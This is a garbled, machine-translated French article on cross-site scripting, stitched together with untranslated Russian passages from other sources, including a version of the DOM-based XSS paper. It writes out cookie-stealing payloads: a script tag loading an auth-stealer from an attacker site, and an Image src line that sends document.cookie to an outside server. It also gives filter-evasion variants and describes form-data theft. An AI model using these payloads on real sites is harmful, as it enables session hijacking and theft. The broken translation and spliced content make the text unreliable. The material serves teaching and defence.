La formation d'attaque XSS. Vulnérabilité XSS - Qu'est-ce que c'est? Exemples de vulnérabilités XSS. Données de formulaires remplis

Script d'intersype (XSS) est une vulnérabilité qui consiste à mettre en œuvre le code exécutable du côté client (JavaScript) de la page Web que d'autres utilisateurs sont apportés.

La vulnérabilité découle en raison d'un filtrage insuffisant des données, que l'utilisateur envoie à insérer dans une page Web. Il est beaucoup plus facile de comprendre exemple spécifique. Rappelez-vous tout livre d'or - Ce sont des programmes destinés à accepter des données de l'utilisateur et de l'affichage ultérieur. Imaginez que le livre d'or ne vérifie aucune façon et ne filtre pas les données entrées, mais les affiche simplement.

Vous pouvez goûter votre propre script plus simple (Il n'y a rien de plus facile que d'écrire de mauvais scripts sur PHP - cela est très impliqué dans cela). Mais il y a déjà beaucoup d'options prêtes à l'emploi. Par exemple, je propose de commencer une connaissance avec Dojo et Owasp Mutillidae II. Il y a un exemple similaire. Dans l'environnement de Dojo autonome, allez au navigateur par référence: http: //localhost/mutillidae/index.php? Page \u003d Add-à-votre-blog.php

Si une personne des utilisateurs est entrée:

Cette page Web affichera:

Hey! Comme votre site.

Et si l'utilisateur entre dans ceci:

Hey! Comme votre site.

Qui sera affiché comme ceci:

Les navigateurs gardent un ensemble de cookies grand nombre des sites. Chaque site peut obtenir des cookies seulement sauvegardés. Par exemple, le site Web d'exemple.com a conservé des cookies dans votre navigateur. Vous êtes le crash sur le site d'un autre.com, ce site (scripts client et serveur) ne peut pas accéder aux cookies que le site Web d'Exemple.com a été enregistré.

Si le site Exemple.com est vulnérable à XSS, cela signifie que nous pouvons en une manière ou une autre pour implémenter le code JavaScript dans celui-ci et ce code sera exécuté pour le compte de l'exemple de site.com! Ceux. Ce code recevra, par exemple, l'accès à l'exemple de site de Cookis.

Je pense que tout le monde se souvient que JavaScript est exécuté dans les navigateurs d'utilisateurs, c'est-à-dire Avec la présence de XSS, intégré code malicieux Accède aux données de l'utilisateur qui a ouvert la page du site Web.

Le code incorporé est capable de tout ce que JavaScript peut, à savoir:

accès aux cookies du site Vue
peut apporter des changements dans apparence pages
accès au tampon d'échange
peut implémenter des programmes sur JavaScript, par exemple, Ki-Loggers (intercepteurs de touches poussées)
touchez sur le boeuf.
et etc.

L'exemple le plus simple Avec Cookiz:

En fait, alerte. Utilisé uniquement pour détecter les XSS. Real Malware Libre des charges cachées. Il est caché de se lier à un serveur d'intrusion distant et transmet des données volées dessus.

Types de XSS.

La chose la plus importante est que vous devez comprendre les types de XSS ce qu'ils se produisent:

Stocké (constant)
Réfléchie (non permanent)

Exemple de permanent:

Un attaquant a introduit un message spécialement formé au livre d'or (commentaire, message du forum, profilé) qui est stocké sur le serveur, chargé à partir du serveur chaque fois que les utilisateurs demandent l'affichage de cette page.
L'attaquant a reçu l'accès aux données du serveur, par exemple via une injection SQL et introduit aux données appelées utilisées pour le code JavaScript malveillant (avec ki-enregistreurs ou avec du bœuf).

Échantillon de non-permanent:

Le site a une recherche, qui, avec les résultats de la recherche, montre quelque chose comme "que vous recherchiez: [String de recherche]", tandis que les données ne sont pas filtrées correctement. Étant donné qu'une telle page ne s'affiche que pour avoir un lien avec elle, tandis que l'attaquant n'enverra pas le lien vers d'autres utilisateurs du site, l'attaque ne fonctionnera pas. Au lieu d'envoyer une référence à la victime, vous pouvez utiliser le placement d'un script malveillant sur un site neutre visitant la victime.

Toujours se démarquer (certains comme une sorte de vulnérabilités XSS non permanente, certains disent que cette espèce peut être une variété de XSS constants):

Modèle DOM

Caractéristiques XSS basées sur DOM

Si vous êtes tout à fait simple, le code malveillant du code XSS non permanent ne peut être vu si vous ouvrez le code HTML. Par exemple, le lien est formé de cette manière:

Http://example.com/search.php?q\u003d "/\u003e

Et lors de l'ouverture du code HTML d'origine, nous voyons quelque chose comme ceci:

Et DOM XSS change la structure DOM formée dans le navigateur à la volée et voir le code malveillant que nous ne puissions que lors de la visualisation de la structure DOM formée. HTML ne change pas. Prenons ce code par exemple:

site ::: Dom XSS

Une erreur s'est produite ...

Que dans le navigateur, nous verrons:

Code source de page:

Formulons l'adresse comme suit:

Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.;

Maintenant, la page ressemble à ceci:

Mais regardons la source HTML:

Il n'y avait absolument rien changé. À propos de cela, j'ai dit, nous devons regarder le document Dom Structure pour identifier le code malveillant:

Voici un prototype de travail XSS, pour une attaque réelle, nous avons besoin d'une charge utile plus complexe impossible en raison du fait que l'application cesse de lire immédiatement après un point avec une virgule et quelque chose du genre alerte (1); alerte (2) N'est plus possible. Cependant, grâce à unescape () Dans les données retournées, nous pouvons utiliser la charge utile comme celle-ci:

Http: //localhost/tests/xss/dom_xss.html#input\u003dtokenalex.;

Où nous avons remplacé le symbole ; Sur l'équivalent codé dans l'URI!

Nous pouvons maintenant écrire un logiciel malveillant de JavaScript et faire un lien pour envoyer la victime, comme cela est fait pour les scripts standard non permanents.

Auditeur XSS

DANS Google Chrome. (ainsi que dans l'opéra, qui utilise maintenant le moteur Google Chrome), j'attendais une telle surprise:

dOM_XSS.HTML: 30 L'Auditeur XSS a refusé d'exécuter un script dans "http: //localhost/tests/xss/dom_xss.htm#input\u003dToken \u003cscript\u003e alerte (1)"Parce que son code source a été trouvé dans la demande. L'auditeur a été activé en tant que serveur envoyé ni une en-tête" X-XSS-Protection "Ni" Content-Security-Policy ".

Ceux. Maintenant, dans le navigateur, il y a un auditeur XSS qui essaiera de prévenir les XSS. Il n'y a pas de cette fonctionnalité de ce type dans Firefox, mais je pense que c'est une question de temps. Si la mise en œuvre des navigateurs réussira, nous pouvons alors parler d'une difficulté significative d'utiliser des XSS.

Il est utile de se rappeler que navigateurs modernes Prenez des mesures pour limiter le niveau de fonctionnement des problèmes tels que XSS non permanents et basé sur DOM XSS. Y compris qu'il est nécessaire de rappeler lorsque vous testez des sites Web à l'aide d'un navigateur - il se peut que l'application Web soit vulnérable, mais vous ne voyez pas de confirmation contextuelle pour la raison pour laquelle le navigateur le bloque.

Exemples d'exploitation de XSS.

Les malfaiteurs, l'intention d'utiliser des vulnérabilités de script intersiteite, devraient approcher chaque classe de vulnérabilités de différentes manières. Voici les vecteurs d'attaques pour chaque classe.

Avec les vulnérabilités XSS, le boeuf peut être utilisé dans des attaques, ce qui élargit l'attaque du site Web à l'environnement local des utilisateurs.

Exemple d'attaque avec des XSS non permanents

1. Alice visit souvent un site Web spécifique qui héberge Bob. Le site Web BOB permet à Alice de se connecter avec le nom de l'utilisateur / du mot de passe et de conserver des données sensibles, telles que les informations de paiement. Lorsque l'utilisateur exerce une entrée, le navigateur conserve les cookies d'autorisation qui ressemblent à des caractères sans signification, c'est-à-dire. Les deux ordinateurs (client et serveur) se souviennent qu'il est entré.

2. Malories note que le site Web de BOB contient une vulnérabilité de XSS non permanente:

2.1 Lors de la visite de la page de recherche, nous entrons une ligne à rechercher et cliquez sur le bouton Envoyer si les résultats ne sont pas trouvés, la page affiche la chaîne de recherche entrée, suivie des mots "non trouvés" et de l'URL. http://bobssite.org?q\u003dyu requête de recherche

2.2 avec une requête de recherche normale comme le mot " chienchien»Page Affiche simplement" chienchien Non trouvé "et URL http://bobssite.org?q\u003d chienchienQuel est le comportement tout à fait normal.

2.3 Néanmoins, quand une requête de recherche anormale est envoyée à la recherche :

2.3.1 Un message d'avertissement apparaît (qui dit "XSS").

2.3.2 Affichages de page pas trouvé Avec un message d'erreur avec le texte "XSS".

2.3.3 URL adaptée à l'opération http://bobssite.org?q\u003d.alert("xss");

3. Malories conçoit l'URL pour exploiter la vulnérabilité:

3.1 elle fait l'URL http://bobssite.org?q\u003dpuppies. . Il peut choisir de convertir des caractères ASCII dans un format hexadécimal, tel que http://bobssite.org?q\u003dpuppies%3CScript%2520Src%3D%22HTTP%3A%2F%2FMALLORYSEVILSITE.JEZ%2FAUTUHSTEALER.JS%22%3E. Pour que les gens puissent découvrir immédiatement une URL malveillante.

3.2 Elle envoie un e-mail à un membre sans méfiance du site Bob, en disant: "Vérifiez les chiens cool."

4. Alice reçoit une lettre. Elle aime les chiens et clique sur le lien. Elle va sur le site Bob dans la recherche, elle ne trouve rien, il affiche les "chiens non trouvés", et au milieu de la balise, la balise est démarrée avec un script (il est invisible à l'écran), Charges et exécute le programme Malory authstealer.js (attaque XSS). Alice oublie à ce sujet.

5. Le programme AuthStealer.js commence dans le navigateur Alice comme si sa source est le site Web de BOB. Elle capture une copie des cookies d'autorisation d'Alice et envoie au serveur de Malory, où les malories les suppriment.

7. Maintenant que les Malories à l'intérieur, il va sur le site Web du site Web, looke et voler une copie du numéro de carte de crédit Alice. Puis elle va et change le mot de passe, c'est-à-dire Maintenant, Alice ne peut même pas aller.

8. Elle décide de passer la prochaine étape et envoie une référence à Bob lui-même de la même manière, et reçoit donc des privilèges administratifs du site BOB.

Attaque avec des XSS constants

Malories a un compte sur le site Bob.
Malory note que le site Web de BOB contient une vulnérabilité XSS constante. Si vous allez à nouvelle section, Placez un commentaire, puis il affiche qu'il ne serait pas imprimé. Mais si le texte de commentaire contient des balises HTML, ces balises seront affichées comme elles sont, et toutes les balises de script sont lancées.
Malay lit un article dans la section des nouvelles et écrit un commentaire dans la section des commentaires. Dans le commentaire, il insère le texte:
Dans cette histoire, j'ai tellement aimé les chiens. Ils sont si gentils!
Faites attention auxquelles les codes du code HTML tombent votre code intégré. Voici un exemple d'un champ de saisie de champ typique ( contribution):

Notre charge utile ira à l'endroit où le mot «taies d'oreiller» est maintenant. Ceux. se transformer en étiquette contribution. Nous pouvons éviter cela - fermez une citation double, puis la balise elle-même avec "/>

"/>
Essayons-la pour certains sites:

Excellente vulnérabilité

Programmes de recherche et de recherche de la vulnérabilité XSS

Probablement toutes les scanneurs d'applications Web ont un scanner de vulnérabilité XSS intégré. Ce sujet est awkhangeing, il est préférable de se familiariser avec chacun de ce scanner séparément.

Le script inter-sites (Abréviated XSS) est une vulnérabilité généralisée affectant de nombreuses applications Web. Il permet à un attaquant de mettre en œuvre du code malveillant dans un site Web de telle sorte que le navigateur d'utilisateur qui soit entré dans le site exécutera ce code.

Habituellement, une certaine interaction avec l'utilisateur est tenue d'exploiter cette vulnérabilité: elle est attirée sur un site infecté avec un ingénierie sociale ou juste attendre jusqu'à ce qu'il visite lui-même sur ce site. Par conséquent, les développeurs ne sont souvent pas perçus sérieusement XSS-Vulnérabilité.

Mais s'ils ne sont pas éliminés, cela peut être une menace de sécurité grave.

Imaginez que nous sommes dans le panneau Admin WordPress, ajoutez de nouveaux contenus. Si nous utilisons un plugin vulnérable à XSS, le navigateur peut créer un nouvel administrateur, modifier le contenu et effectuer d'autres actions malveillantes. Le script de cross-sites fournit un attaquant avec un contrôle presque complet sur le plus important logiciel De nos jours - Navigateur.

XSS: Vulnérabilité d'injection

Tout site Web ou application comporte plusieurs sites de saisie de données - formes à l'URL elle-même. L'exemple le plus simple des données d'entrée est lorsque nous entrons le formulaire de nom d'utilisateur et de mot de passe:

Notre nom sera stocké dans la base de données de site pour une interaction ultérieure avec nous. Sûrement, lorsque vous avez passé une autorisation sur n'importe quel site, vous avez vu un message d'accueil personnel dans le style de "Bienvenue, Ilya".

C'est à ces fins que les noms d'utilisateur sont stockés dans la base de données.

L'injection s'appelle une procédure lorsque, au lieu d'un nom ou d'un mot de passe, une séquence spéciale de symboles qui rend le serveur ou un navigateur répondent à certains, l'attaquant souhaité est entré.

Un script intersight s'appelle une injection qui implémente le code qui effectuera des actions dans le navigateur pour le compte du site Web. Il peut se produire à la fois avec la notification de l'utilisateur et dans mode de fond, sans sa connaissance.

Attaques Traditionnelles XSS:

Réfléchie (non permanent).

L'attaque XSS réfléchie est déclenchée lorsque l'utilisateur passe à un lien spécialement préparé.

Ces vulnérabilités apparaissent lorsque les données fournies par le client Web sont le plus souvent dans les paramètres de requête HTTP ou sous la forme de HTML sont exécutées directement par des scripts de serveur à l'analyse syntaxique et affichent la page de résultats de ce client, sans traitement correct.

Stocké (constant).

Les XSS stockés sont possibles lorsqu'un attaquant parvient à mettre en œuvre un code malveillant sur le serveur, en cours d'exécution dans le navigateur chaque fois lors de l'accès à la page d'origine. L'exemple classique de cette vulnérabilité est des forums sur lesquels il est autorisé à laisser des commentaires au format HTML.

Vulnérabilités causées par le code du côté du client (JavaScript, Visual Basic, Flash, etc.):

Également connu sous le nom de modèles DOM:

Réfléchie (non permanent).

Les mêmes que dans le cas du serveur, uniquement dans ce cas, l'attaque est possible en raison du fait que le code est traité par le navigateur.

Stocké (constant).

Semblable au stockage de XSS sur le côté serveur, uniquement dans ce cas, le composant malveillant est enregistré du côté du client à l'aide du stockage du navigateur.

Exemples de vulnérabilités XSS.

Fait intéressant, dans la plupart des cas, cette vulnérabilité est décrite, nous sommes effrayés par le code suivant:
Http://www.site.com/page.php?var\u003d
Il existe deux types de vulnérabilités XSS - passif et actif.

Vulnérabilité active Plus dangereux, comme un attaquant n'a pas besoin d'attirer le sacrifice sur un lien spécial, il suffit à lui de mettre en œuvre le code dans la base ou dans un fichier sur le serveur. Ainsi, tous les visiteurs du site deviennent automatiquement des victimes. Il peut être intégré, par exemple, en incorporant le code SQL (injection SQL). Par conséquent, vous ne devez pas faire confiance aux données stockées dans la base de données, même si dans l'insert, ils ont été traités.

Exemple vulnérabilité passive Vous pouvez voir au tout début de l'article. Il existe déjà des ingénieurs sociaux, par exemple, une lettre importante de l'administration du site vous demandant de vérifier les paramètres de votre compte, après la récupération de la sauvegarde. En conséquence, vous devez connaître l'adresse de la victime ou simplement organiser une lettre d'information sur le spam ou placer un poste sur un forum, et pas encore le fait que les victimes soient naïves et vont à votre lien.

De plus, des vulnérabilités passives peuvent être soumises à la fois au poste et à obtenir des paramètres. Avec des paramètres post-paramètres, il sera compris, vous devrez faire des astuces. Par exemple, la redirection du site intrus.

Par conséquent, la vulnérabilité d'obtenir est un peu plus dangereuse, car la victime est plus facile de remarquer le mauvais domaine que paramètre supplémentaire (Bien que l'URL puisse être codée du tout).

Biscuits

C'est l'exemple le plus fréquemment cité des attaques XSS. Dans les sites de cookies stocker parfois toutes les informations précieuses (parfois même la connexion et le mot de passe (ou son hachage) de l'utilisateur), mais le plus dangereux est le vol d'une session active, alors n'oubliez pas d'appuyer sur le lien "Quitter" sur les sites, même si cela ordinateur de famille. Heureusement, dans la plupart des ressources, la durée de vie de la session est limitée.
Var іmg \u003d nouvelle image (); Іmg.sps \u003d "http: //site/xss.php?" + document.cookie;
Par conséquent, les restrictions de domaine sur XMLHTTPRequest, mais l'attaquant n'est pas effrayant car il y a , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Все мы знаем, что такое межсайтовый скриптинг, правда? Это уязвимость, при которой атакующий посылает злонамеренные данные (обычно это HTML, содержащий код Javascript), которые позднее возвращаются приложением, что вызывает исполнение Javascript кода. Итак, это неверно! Существует тип XSS атак не соответствующий этому определению, по крайней мере, в основных фундаментальных принципах. XSS атаки, определение которых приведено выше, подразделяются на моментальные (злонамеренные данные встраиваются в страницу, которая возвращается браузеру сразу же после запроса) и отложенные (злонамеренные данные возвращаются через некоторое время). Но есть еще третий тип XSS атак, в основе которого не лежит отправка злонамеренных данных на сервер. Несмотря на то, что это кажется противоречащим здравому смыслу, есть два хорошо описанных примера такой атаки. Эта статья описывает третий тип XSS атак – XSS через DOM (DOM Based XSS). Здесь не будет написано ничего принципиально нового об атаке, скорее новшество этого материала в выделении <a href="https://newtravelers.ru/fr/setting/testirovanie-skorosti-ssd-kak-proverit-skorost-diska-hdd-ssd-test.html">отличительных черт</a> атаки, которые являются очень важными и интересными.</p> <p>Разработчики и пользователи прикладных приложений должны понимать принципы атаки XSS через DOM, так как она представляет угрозу для web приложений и отличается от обычного XSS. В сети интернет есть много web приложений уязвимых к XSS через DOM и при этом проверенных на XSS и признанных “неуязвимыми” к этому типу атак. Разработчики и администраторы сайтов должны ознакомиться с методами обнаружения и защиты от XSS через DOM, так как эти методики отличаются от приемов, используемых при работе со стандартными XSS уязвимостями.</p> <h3>Введение</h3> <p>Читатель должен быть знаком с основными принципами XSS атак (, , , , ). Под XSS обычно подразумевается моментальный () и отложенный межсайтовый скриптинг. При моментальном XSS злонамеренный код (Javascript) возвращается атакуемым сервером немедленно в качестве ответа на HTTP запрос. Отложенный XSS означает, что злонамеренный код сохраняется на атакуемой системе и позднее может быть внедрен в <a href="https://newtravelers.ru/fr/error/tegi-html-opredeleniya-ramki-stranicy-atributy-html-tegov-sozdanie-form-i.html">HTML страницу</a> уязвимой системы. Как было упомянуто выше, такая классификация предполагает, что фундаментальное свойство XSS состоит в том, что злонамеренный код отсылается из браузера на сервер и возвращается в этот же браузер (моментальный XSS) или любой другой браузер (отложенный XSS). В этой статье поднимается вопрос о том, что это неверная классификация. Возможность осуществления XSS атаки, не основывающейся на внедрении кода в страницу, возвращаемую сервером, оказала бы серьезное влияние на методы защиты и обнаружения. Принципы таких атак обсуждаются в этой статье.</p> <h3>Пример и комментарии</h3> <p>Перед описанием простейшего сценария атаки важно подчеркнуть, что методы, описываемые здесь, уже неоднократно демонстрировались публично (например, , и ). Я не претендую на то, что приведенные ниже методики описываются впервые (хотя некоторые из них имеют отличия от ранее опубликованных материалов).</p> <p>Признаком уязвимого сайта может служить наличие HTML страницы, использующей данные из document.location, document.URL или document.referrer (или любых других объектов на которые может влиять атакующий) небезопасным способом.</p> <p>Примечание для читателей незнакомых с этими <a href="https://newtravelers.ru/fr/wireless/vvedenie-v-vsplyvayushchie-sobytiya-prodvinutaya-rabota-s-obektom.html">объектами Javascript</a>: когда код Javascript выполняется в браузере, он получает доступ к нескольким объектам, представленных в рамках DOM (Document <a href="https://newtravelers.ru/fr/error/ispolzovanie-xml-document-object-model-putevoditel-po-internetu---vse.html">Object Model</a> – Объектная Модель Документа). Объект document является главным среди этих объектов и предоставляет доступ к большинству свойств страницы. Этот объект содержит много вложенных объектов, таких как location, URL и referrer. Они управляются браузером в соответствии с точкой зрения браузера (как будет видно ниже, это весьма существенно). Итак, document.URL и document.location содержат URL страницы, а точнее, то, что браузер подразумевает под URL. Обратите внимание, эти объекты не берутся из тела HTML страницы. Объект document содержит объект body, содержащий обработанный (parsed) HTML код страницы.</p> <p>Не сложно найти HTML страницу, содержащую Javascript код, который анализирует строку URL (получив к ней доступ через document.URL или document.location) и в соответствии с ее значением выполняет некоторые действия на стороне клиенте. Ниже приведен пример такого кода.</p> <p>По аналогии с примером в рассмотрим следующую HTML страницу (предположим, что это содержание <span>http://www.vulnerable.site/welcome.html </span>):</p> <p><HTML> <TITLE>Welcome!</TITLE> Hi <SCRIPT> var pos=document.URL.indexOf("name=")+5; document.write(document.URL.substring(pos,document.URL.length)); </SCRIPT> <BR> Bienvenue sur notre système ...</HTML></p> <p>Cependant, la demande comme celle-ci -</p> <p>http://www.vulnerable.site/welcome.html?name\u003d.<script>alert(document.cookie)</script></p> <p>appelé XSS. Considérez pourquoi: le navigateur de la victime qui a reçu ce lien envoie une demande HTTP à www.vulnerable.site et reçoit la page HTML (statique!) Susmentionnée. Le navigateur de la victime commence à analyser ce code HTML. DOM contient un objet de document ayant un champ URL, et ce champ est rempli de la valeur de la page en cours pendant le processus de création DOM. Lorsque l'analyseur de syntaxe est livré sur le code JavaScript, il l'exécute qui provoque la modification du code HTML de la page affichée. Dans ce cas, le code fait référence au document.url et puisque une partie de cette ligne pendant la paveur de syntaxe est incorporée dans HTML, qui est immédiatement analysée, le code détecté (...)) est effectué dans le contexte du même page.</p> <p>Remarques:</p> <p>1. Le code malveillant n'est pas intégré à la page HTML (par opposition à d'autres espèces de XSS). <br> 2. Cet exploit fonctionnera à condition que le navigateur ne modifie pas les caractères de l'URL. Mozilla code automatiquement les caractères '<’ и ‘>'(En% 3C et% 3e 3e, respectivement) dans les objets de document ci-joints. Si l'URL a été imprimée directement dans la barre d'adresse, ce navigateur est invulnérable à l'attaque décrite dans cet exemple. Cependant, si les personnages n'ont pas besoin d'attaquer »<’ и ‘>'(Dans la forme initiale inextimation), une attaque peut être mise en œuvre. Microsoft. <a href="https://newtravelers.ru/fr/useful/ie-ne-mozhet-otobrazit-stranicu-internet-explorer-ne-mozhet-otobrazit.html">Internet Explorer.</a> 6.0 n'encore pas '<’ и ‘>«Et donc vulnérable à l'attaque décrite sans aucune restriction. Cependant, il existe de nombreux scénarios d'attaques qui n'ont pas besoin de<’ и ‘>', Et donc, même Mozilla n'a pas d'immunité à cette attaque.</p> <h3>Méthodes de détection et de prévention des vulnérabilités de ce type</h3> <p>Dans l'exemple ci-dessus, le code malveillant est toujours transmis au serveur (dans le cadre de la requête HTTP), l'attaque peut donc être détectée, ainsi que toute autre attaque XSS. Mais c'est un problème résolu.</p> <p>Considérez l'exemple suivant:</p> <p>http://www.vulnerable.site/welcome.html#name\u003d.<script>alert(document.cookie)<script></p> <p>Обратите внимание на символ ‘#’ справа от имени файла. Он говорит браузеру, что все после этого символа не является частью запроса. Microsoft Internet Explorer (6.0) и Mozilla не отправляет фрагмент после символа ‘#’ на сервер, поэтому для сервера этот запрос будет эквивалентен http://www.vulnerable.site/welcome.html, т.е. злонамеренный код даже не будет замечен сервером. Таким образом, благодаря этому приему, браузер не отправляет злонамеренную полезную нагрузку на сервер.</p> <p>Но все же в некоторых случаях невозможно скрыть полезную нагрузку: в и злонамеренная полезная нагрузка является частью имени пользователи (username) в URL типа http://username@host/. В этом случае браузер отправляет запрос с заголовком Authorization, содержащий имя пользователи (злонамеренная полезная нагрузка), в результате чего злонамеренный код попадает на сервер (закодированный с помощью Base64 – следовательно IDS/IPS для обнаружения атаки должны вначале декодировать эти данные). Однако сервер не обязан внедрять эту полезную нагрузку в одну из доступных HTML страниц, хотя это является необходимым условием выполнения XSS атаки.</p> <p>Очевидно, что в ситуациях, когда полезная нагрузка может быть полностью скрыта, средства обнаружения (IPS) и предотвращения (IPS, межсетевые экраны для web приложений) не могут полностью защитить от этой атаки. Даже если полезную нагрузку нужно отсылать на сервер, во многих случаях для избежания обнаружения она может быть преобразована определенным образом. Например, если какой-то параметр защищен (к примеру, параметр name в примере выше), небольшое изменение сценария атаки может принести результат:</p> <p><script>(document.cookie)</script></p> <p>Une stratégie de sécurité plus stricte nécessiterait une référence obligatoire au paramètre Nom. Dans ce cas, vous pouvez faire la requête suivante:</p> <p>http://www.vulnerable.site/welcomecome.html?notname\u003d <script>alerte (document.cooke) <script>& Nom \u003d joe</p> <p>Si la stratégie de sécurité limite des noms de paramètres supplémentaires (par exemple: FOOBAR), vous pouvez utiliser l'option suivante:</p> <p>http://www.vulnerable.site/welcome.html?foobar\u003dname\u003d. <script>alerte (document.cooke) <script>& Nom \u003d joe</p> <p>Veuillez noter que le paramètre ignorable (FOOBAR) doit d'abord aller et dans sa valeur pour contenir une charge utile.</p> <p>Le script d'attaque décrit dans est encore plus préférable pour l'attaquant, en tant que document complet.Location est écrit sur la page HTML (code JavaScript ne recherche pas un nom de paramètre spécifique). Ainsi, l'attaquant peut entièrement masquer la charge utile en envoyant ce qui suit:</p> <p>/Atachment.cgi?id\u003d&action\u003dfoobar#<script>alert(document.cookie)</script></p> <p>Même si la charge utile est analysée par le serveur, la protection peut être garantie uniquement si la demande est rejetée ou la réponse sera remplacée par un texte d'erreur. Retournez-nous vers et: Si l'en-tête d'autorisation est simplement supprimé par le système de protection intermédiaire, il n'aura aucun effet si la page d'origine est renvoyée. De même, toute tentative de traitement de données sur le serveur, en supprimant ou en encodant des caractères interdites, sera inefficace contre cette attaque.</p> <p>Dans le cas du document.Referrer, la charge utile est envoyée au serveur via l'en-tête de référateur. Toutefois, si le navigateur ou la protection intermédiaire de l'utilisateur supprime ce titre - il n'y aura aucune trace de l'attaque, ce qui peut être totalement inaperçu.</p> <p>Résumant, nous concluons que les méthodes traditionnelles, à savoir</p> <p>1. codage <a href="https://newtravelers.ru/fr/useful/vyvod-otpravlennyh-formoi-dannyh-v-php-sozdanie-html-form-ii-vvod.html">données HTML</a> Sur le côté serveur <br> 2. Suppression / codage Les données d'entrée interdites sur le côté serveur ne fonctionnent pas contre DOM XSSS.</p> <p>La recherche automatique des vulnérabilités par "bombardement" Les données malveillantes (parfois appelées Fuzzing) ne fonctionneront pas, car les programmes utilisant cette technique apportent généralement des conclusions sur la base de la présente que les données intégrées sont présentes dans la page retournée ou non (au lieu d'effectuer le code dans le contexte de le navigateur de côté du client et observation des résultats). Toutefois, si un programme peut analyser statiquement le code JavaScript, détecté sur la page, il peut indiquer des signes suspects (voir ci-dessous). Et bien sûr, si les outils de sécurité peuvent exécuter le code JavaScript (et initialiser correctement les objets DOM) ou émuler cette exécution, ils pourront détecter cette attaque.</p> <p>La recherche manuelle de la vulnérabilité à l'aide d'un navigateur fonctionnera également, car le navigateur peut exécuter le code client JavaScript. Les outils de vulnérabilité peuvent adopter cette méthode et exécuter du code sur le côté du client pour suivre les résultats de son exécution. <br> Protection efficace</p> <p>Évitez de réécrire un document sur le côté client, la redirection ou d'autres actions similaires à l'aide des données du côté client. La plupart de ces actions peuvent être effectuées à l'aide de pages dynamiques (du côté serveur). <br> 2.</p> <p>Analyse et amélioration de la sécurité du code sur le côté du client. Liens vers les objets DOM auquel l'utilisateur peut affecter (attaquant) doit être soigneusement vérifié. Une attention particulière devrait être accordée aux objets suivants (mais sans limiter): <br> * document.url <br> * document.urlunencodé <br> * document.location (et ses propriétés) <br> * Document.referrer. <br> * Fenêtre.Location (et ses propriétés)</p> <p>Remarque: les propriétés des objets de document et de fenêtre peuvent être mentionnées de plusieurs manières: explicitement (exemple - fenêtre.location), implicitement (Exemple - Emplacement) ou à l'aide de la réception du descripteur et de l'utiliser (Exemple - Garde_To_Some_Window.Location) .</p> <p>Une attention particulière devrait être accordée au code dans lequel DOM est modifié, explicitement ou il existe une opportunité potentielle, ainsi que d'un accès direct au HTML ou de l'accès directement au DOM. Exemples (ce n'est en aucun cas une liste exhaustive): <br> * Enregistrement dans le code de page HTML: <br> o document.write (...) <br> o document.writeln (...) <br> o documents.body.innerhtml \u003d ... <br> * Changer DOM directement (y compris les événements DHTML): <br> o documents.forms.action \u003d ... (et d'autres variations) <br> o Document.attachevent (...) <br> o Document.create ... (...) <br> o document.execcommand (...) <br> o Document.bon. ... (accès à dom à travers l'objet corporel) <br> o window.attachetatevent (...) <br> * Modifier l'URL du document: <br> o Document.location \u003d ... (ainsi que d'attribuer l'emplacement de l'objet Href, Host et HostName Valeurs) <br> o documents.loocession.hostname \u003d ... <br> o document.localisation.replace (...) <br> o document.location.Assign (...) <br> o document.url \u003d ... <br> o window.navigater (...) <br> * Ouverture / modification de l'objet Window: <br> o Document.Open (...) <br> o window.open (...) <br> o window.location.href \u003d ... (ainsi que l'attribution de la valeur de l'emplacement d'objet hôte et d'hôte d'hôte) <br> * Exécution de script directement: <br> o eval (...) <br> o window.execscript (...) <br> O window.setInterval (...) <br> O fenêtre.settimeout (...)</p> <p>À la suite de l'exemple susmentionné, de protéger efficacement le script d'origine peut être remplacé par le code suivant qui vérifie la chaîne écrite sur la page HTML pour uniquement les caractères alphanumériques.</p> <p>Quelle est la vulnérabilité XSS? Est-ce que ça vaut la peine de craindre?</p> <p>Le script inter-sites (Abréviated XSS) est une vulnérabilité généralisée affectant de nombreuses applications Web. Il permet à un attaquant de mettre en œuvre du code malveillant dans un site Web de telle sorte que le navigateur d'utilisateur qui soit entré dans le site exécutera ce code.</p> <p>Habituellement, une certaine interaction avec l'utilisateur est tenue d'exploiter cette vulnérabilité: elle est attirée sur un site infecté avec un ingénierie sociale ou juste attendre jusqu'à ce qu'il visite lui-même sur ce site. Par conséquent, les développeurs ne sont souvent pas perçus sérieusement XSS-Vulnérabilité. Mais s'ils ne sont pas éliminés, cela peut être une menace de sécurité grave.</p> <p>Imaginez que nous sommes dans le panneau Admin WordPress, ajoutez de nouveaux contenus. Si nous utilisons un plugin vulnérable à XSS, le navigateur peut créer un nouvel administrateur, modifier le contenu et effectuer d'autres actions malveillantes.</p> <p>Intersype Scripting fournit un attaquant avec un contrôle presque complet sur le logiciel le plus important aujourd'hui - Navigateur.</p> <h2> XSS: Vulnérabilité d'injection</h2> <p>Tout site Web ou application comporte plusieurs sites de saisie de données - formes à l'URL elle-même. L'exemple le plus simple des données d'entrée est lorsque nous entrons le formulaire de nom d'utilisateur et de mot de passe:</p> <p><b>Figure 1. Formulaire de saisie de données</b></p> <p>Notre nom sera stocké dans la base de données de site pour une interaction ultérieure avec nous. Sûrement, lorsque vous avez passé une autorisation sur n'importe quel site, vous avez vu un message d'accueil personnel dans le style de "Bienvenue, Ilya". C'est à ces fins que les noms d'utilisateur sont stockés dans la base de données.</p> <p>L'injection s'appelle une procédure lorsque, au lieu d'un nom ou d'un mot de passe, une séquence spéciale de symboles qui rend le serveur ou un navigateur répondent à certains, l'attaquant souhaité est 